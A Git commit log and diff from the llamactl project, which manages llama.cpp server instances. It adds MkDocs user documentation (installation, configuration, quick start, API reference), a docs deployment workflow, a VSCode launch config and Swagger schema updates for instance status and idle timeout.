50 Commits

Author SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
53 changed files with 3154 additions and 880 deletions

65
.github/workflows/docs.yml vendored Normal file

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
- '.github/workflows/docs.yml'
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: read
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0 # Needed for git-revision-date-localized plugin
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
- name: Upload documentation artifact
if: github.ref == 'refs/heads/main'
uses: actions/upload-pages-artifact@v3
with:
path: ./site
deploy:
if: github.ref == 'refs/heads/main'
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v4

19
.vscode/launch.json vendored Normal file

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}


@@ -129,6 +129,50 @@ Use this format for pull request titles:
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)

105
README.md

@@ -11,11 +11,11 @@
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
![Dashboard Screenshot](docs/images/screenshot.png)
![Dashboard Screenshot](docs/images/dashboard.png)
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
@@ -113,6 +113,8 @@ instances:
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
@@ -121,7 +123,6 @@ instances:
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
@@ -129,103 +130,7 @@ auth:
management_keys: [] # Keys for management endpoints
```
<details><summary><strong>Full Configuration Guide</strong></summary>
For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
#### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
</details>
## License


@@ -884,6 +884,10 @@ const docTemplate = `{
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -1018,6 +1022,10 @@ const docTemplate = `{
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1078,8 +1086,7 @@ const docTemplate = `{
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1194,6 +1201,19 @@ const docTemplate = `{
} }
} }
}, },
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": { "instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
@@ -1204,9 +1224,13 @@ const docTemplate = `{
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },


@@ -877,6 +877,10 @@
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -1011,6 +1015,10 @@
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1071,8 +1079,7 @@
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1187,6 +1194,19 @@
} }
} }
}, },
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": { "instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
@@ -1197,9 +1217,13 @@
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },


@@ -136,6 +136,9 @@ definitions:
type: string type: string
host: host:
type: string type: string
idle_timeout:
description: Idle timeout
type: integer
ignore_eos: ignore_eos:
type: boolean type: boolean
jinja: jinja:
@@ -226,6 +229,9 @@ definitions:
type: boolean type: boolean
numa: numa:
type: string type: string
on_demand_start:
description: On demand start
type: boolean
override_kv: override_kv:
items: items:
type: string type: string
@@ -266,8 +272,7 @@ definitions:
type: number type: number
reranking: reranking:
type: boolean type: boolean
restart_delay_seconds: restart_delay:
description: RestartDelay duration in seconds
type: integer type: integer
rope_freq_base: rope_freq_base:
type: number type: number
@@ -344,6 +349,16 @@ definitions:
yarn_orig_ctx: yarn_orig_ctx:
type: integer type: integer
type: object type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process: instance.Process:
properties: properties:
created: created:
@@ -351,9 +366,10 @@ definitions:
type: integer type: integer
name: name:
type: string type: string
running: status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status description: Status
type: boolean
type: object type: object
server.OpenAIInstance: server.OpenAIInstance:
properties: properties:

4
docs-requirements.txt Normal file

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4


@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.


@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!


@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model:
```json
{
"name": "llama2-7b",
"model_path": "/path/to/llama-2-7b-chat.gguf",
"options": {
"threads": 4,
"context_size": 2048
}
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new instance
curl -X POST http://localhost:8080/api/instances \
-H "Content-Type: application/json" \
-d '{
"name": "my-model",
"model_path": "/path/to/model.gguf",
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary image added (filename not captured in this view): not shown, 69 KiB

docs/images/dashboard.png (new binary file): not shown, 44 KiB

Binary image removed (filename not captured in this view): was 47 KiB, not shown

41
docs/index.md Normal file

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.


@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
